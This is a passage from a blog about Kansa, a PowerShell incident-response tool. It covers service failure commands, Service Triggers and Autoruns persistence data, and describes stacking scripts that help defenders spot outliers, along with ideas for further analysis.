<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU41UeVfRhoyVNjIkZGmdsLUiqqsEBVSuoBOz48h6UsBQyDZRGutO7F3HrjZ9DOKS3yZ5gby6MAURGDAoFv8R7unT6QNCVqz-H_Ui_xKbjZxkesbIejK3r4tI_OnBKfOtkoQGA8nk8pV4/s1600/SvcFailCmdLine2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU41UeVfRhoyVNjIkZGmdsLUiqqsEBVSuoBOz48h6UsBQyDZRGutO7F3HrjZ9DOKS3yZ5gby6MAURGDAoFv8R7unT6QNCVqz-H_Ui_xKbjZxkesbIejK3r4tI_OnBKfOtkoQGA8nk8pV4/s1600/SvcFailCmdLine2.jpg" height="147" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
I include this screen shot because I've run into the customscript.cmd entry in multiple data sets and in all the cases I've investigated, I've not yet found a service that referenced customscript.cmd anywhere in the Services GUI, but you will see services reference it in the data of their Registry key values, like the following:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXpYdfAHro2Q1G9xh8dAEu-8lBcxZdvjQszeTItWkAA8UrpGED9EZQ8B8lpuuRqJjLlDOqlVFB-437WWnUbPO9TpbsPLyh5viopibnqhau3GvxRhcZB7IeiGnHihmGl0p2RPZww6Wln7k/s1600/customscriptregistry.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXpYdfAHro2Q1G9xh8dAEu-8lBcxZdvjQszeTItWkAA8UrpGED9EZQ8B8lpuuRqJjLlDOqlVFB-437WWnUbPO9TpbsPLyh5viopibnqhau3GvxRhcZB7IeiGnHihmGl0p2RPZww6Wln7k/s1600/customscriptregistry.jpg" height="347" width="640" /></a></div>
<br />
I've also searched file systems on hosts where I've seen this, but I've not found a file on disk called customScript.cmd. I wanted to mention it here in case you run across it. If you do see a reference to customscript.cmd that includes a path, you may have an adversary attempting to blend in with a common value.<br />
<br />
The last Service related collector in Kansa, as of this writing, is <strong>Get-SvcTrigs.ps1</strong>, which collects another set of ASEPs that Autoruns does not collect, yet -- Service Triggers. Service Triggers are new with Windows 7 and later versions of Windows. They allow Windows Services to have more startup flexibility than the old Manual and Automatic startup modes. Now services can respond to the presence of specific hardware, group policy changes, networking events, etc. More information about Service Triggers can be found at the following links:<br />
<ul>
<li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/dd405513(v=vs.85).aspx">http://msdn.microsoft.com/en-us/library/windows/desktop/dd405513(v=vs.85).aspx</a>,</li>
<li><a href="http://blogs.windows.com/windows/archive/b/developers/archive/2009/10/26/windows7-trigger-start-services-part-1-introduction.aspx">http://blogs.windows.com/windows/archive/b/developers/archive/2009/10/26/windows7-trigger-start-services-part-1-introduction.aspx</a></li>
<li><a href="http://blogs.windows.com/windows/archive/b/developers/archive/2009/10/27/windows7-trigger-start-services-part-2-building-a-trigger-start-optimized-service.aspx">http://blogs.windows.com/windows/archive/b/developers/archive/2009/10/27/windows7-trigger-start-services-part-2-building-a-trigger-start-optimized-service.aspx</a>.</li>
</ul>
Kansa includes a basic stacker for Service Triggers. Interpreting the data to determine what's normal and what's suspicious can be daunting and tedious. Searching on GUIDs can be of some help. Below is a frequency listing of Service Triggers from a relatively small sample, two systems. <br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI5l9yiJtj7LYLScA72jb7UrVtcE-wDdCHt172MWc_82fiAcedVDeVzPWQ_RGI21WMsPpncXUAx_5bBAho1-XOYsrujEJpa7hlbSQMxEFT09TWK7l2a428mCn8itlCcRKmVxjBno_Pzkc/s1600/svctrigstack.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI5l9yiJtj7LYLScA72jb7UrVtcE-wDdCHt172MWc_82fiAcedVDeVzPWQ_RGI21WMsPpncXUAx_5bBAho1-XOYsrujEJpa7hlbSQMxEFT09TWK7l2a428mCn8itlCcRKmVxjBno_Pzkc/s1600/svctrigstack.jpg" height="152" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
I have Service Trigger data from a few thousand machines, but I'm not at liberty to share it here, trust me when I say finding outliers is easier with a larger data set, but keep in mind, just because something is an outlier doesn't mean it's bad and the inverse is also true, just because something is common, it's not necessarily good.<br />
<br />
There is one more ASEP that I know of that Autoruns won't catch, but that Kansa collects, but I'll save that for another post.davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-3210856405130924022014-04-29T17:27:00.000-07:002014-04-29T17:32:38.611-07:00Kansa: Autoruns data and analysis<h2>
I want your input.</h2>
With the "Trailer Park" release of <a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a> marking a milestone for the core framework, I'm turning my focus to analysis scripts for data collected by the current set of modules. As of this writing there are 18 modules, with some overlap between them. I'm seeking more ideas for analysis scripts to package with Kansa and am hopeful that you will submit comments with novel, implementable ideas.<br />
<h3>
Existing modules can be divided into three categories:</h3>
<ol>
<li>Auto Start Extension Points or ASEP data (persistence mechanisms)</li>
<li>Network data (netstat, dns cache)</li>
<li>Process data</li>
</ol>
In the interest of keeping posts to reasonable lengths, I'll limit the scope of each post to a small number of modules or collectors.<br />
<h3>
ASEP collectors and analysis scripts</h3>
<h4>
Get-Autorunsc.ps1</h4>
Runs Sysinternals Autorunsc.exe with arguments to collect all ASEPs (that Autoruns knows about) across all user profiles, includes ASEP hashes, code signing information (Publisher) and command line arguments (LaunchString).<br />
<br />
<strong>Current analysis scripts for Get-Autoruns.ps1 data:</strong><br />
<strong>Get-ASEPImagePathLaunchStringMD5Stack.ps1</strong><br />
Returns a frequency count of ASEPs aggregating on ImagePath, LaunchString and MD5 hash.<br />
<br />
<strong>Get-ASEPImagePathLaunchStringMD5UnsignedStack.ps1</strong><br />
Same as previous stacker, but filters out signed ASEPs.<br />
<br />
<strong>Get-ASEPImagePathLaunchStringPublisherStack.ps1</strong><br />
Returns frequency count of ASEPs aggregated on ImagePath, LaunchString and code signer.<br />
<br />
<strong>Get-ASEPImagePathLuanchStringStack.ps1</strong><br />
Returns frequency count of ASEPs aggregated on ImagePath and LaunchString.<br />
<br />
<strong>Get-ASEPImagePathLaunchStringUnsignedStack.ps1</strong><br />
Same as previous, but filters out signed code.<br />
<br />
A picture is worth a few words, here's a sample of output for the previous analysis script for data from a couple systems:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3C7TOCnwJHbeVXdWcsmOV52Op5LcvY-S-kTIevTQRDE5dICCjvV5oTCzkH3pxAJq9DE_1lqv6J7zkOo6QVlLlN1UV-a4ma0CQf-18VlAzS6P4CX9HwGY4msFcMyTKVfpZZMJaa1tBYk0/s1600/Get-ASEPIPLSUn.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3C7TOCnwJHbeVXdWcsmOV52Op5LcvY-S-kTIevTQRDE5dICCjvV5oTCzkH3pxAJq9DE_1lqv6J7zkOo6QVlLlN1UV-a4ma0CQf-18VlAzS6P4CX9HwGY4msFcMyTKVfpZZMJaa1tBYk0/s1600/Get-ASEPIPLSUn.png" height="160" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for full size image</td></tr>
</tbody></table>
The image above shows the unsigned ASEPs on the two hosts, aggregated by ImagePath and LaunchString. You may want to know which host a given ASEP came from, however, including the host in the output above would break the aggregation. If you want to trace the 7-zip ASEP back to the host it was found on, copy the ImagePath or LaunchString value to the clipboard and from within this Output\Autorunsc\ path where the script was run, use the Powershell commandlet:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">Select-String -SimpleMatch -Pattern "c:\program files (x86)\7-zip\7-zip.dll" *autoruns.tsv</span><br />
<br />
The result will show the files and lines in those files, that match that pattern, each filename contains the hostname where the data came from, and the hostname is also in the file in the PSComputerName field.<br />
<br />
<strong>Get-Autorunsc.ps1</strong> returns the following fields:<br />
<strong>Time</strong>: Last modification time from the Registry or file system for the EntryLocation<br />
<strong>EntryLocation</strong>: Registry or file system location for the Entry<br />
<strong>Entry</strong>: The entry itself<br />
<strong>Enabled</strong>: Enabled or disabled status<br />
<strong>Category</strong>: Autorun category<br />
<strong>Description</strong>: A description of the Autorun<br />
<strong>Publisher</strong>: The publisher from the code signing certificate, if present<br />
<strong>ImagePath</strong>: File system path to the Autorun<br />
<strong>Version</strong>: PE version info<br />
<strong>LaunchString</strong>: Command line arguments or class id from the Registry<br />
<strong>MD5</strong>: MD5 hash of the ImagePath file<br />
<strong>SHA1</strong>: SHA1 hash of the ImagePath file<br />
<strong>PESHA1</strong>: SHA1 Authenticode hash of the ImagePath file<br />
<strong>PESHA256</strong>: SHA256 Authenticode hash of the Image Path file<br />
<strong>SHA256</strong>: SHA256 hash of the ImagePath file<br />
<strong>PSComputerName</strong>: The host where the entry came from<br />
<strong>RunspaceId</strong>: The runspaceid for the Powershell job that collected the data<br />
<strong>PSShowComputerName</strong>: A Boolean flag about whether or not the PSComputerName is included<br />
<br />
These last three fields are artifacts of Powershell remoting.<br />
<br />
Given the available data and the currently available analysis scripts, what other analysis capabilities make sense for the Get-Autorunsc.ps1 output?<br />
<br />
One idea I have, is to take the idea explored in a previous post of mine, "<a href="http://trustedsignal.blogspot.com/2012/02/finding-evil-automating-autoruns.html?q=autoruns" target="_blank">Finding Evil: Automating Autoruns Analysis</a>." This would be a script that takes an external dependency on a database of file hashes that are categorized as good, bad and unknown. The script would match hashes in the Get-Autorunsc.ps1 output, discarding the good, alerting on the bad and submitting unknowns to VirusTotal to see what, if anything is known about them. If VT says they are bad, insert them into the database and alert. If VT says they are good, insert them into the database and ignore them in future runs. If VT has no information on them, mark them for follow up and send them to Cuckoo sandbox or similar for analysis.<br />
<br />
What ideas do you have? What would be helpful to you during IR?<br />
<br />
Thanks for taking the time to read and comment with your thoughts and ideas.<br />
<br />
If you found this information useful, please check out the <a href="http://www.sans.org/event/dfir-summit-2014?utm_source=offsite&utm_medium=text-ad&utm_campaign=DFIR_Summit&utm_content=2014_TE_DFIR_Summit_Speaker_Links_12_Dave_Hull" target="_blank">SANS DFIR Summit</a> where I'll be speaking about Kansa, IR and analysis in June.davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0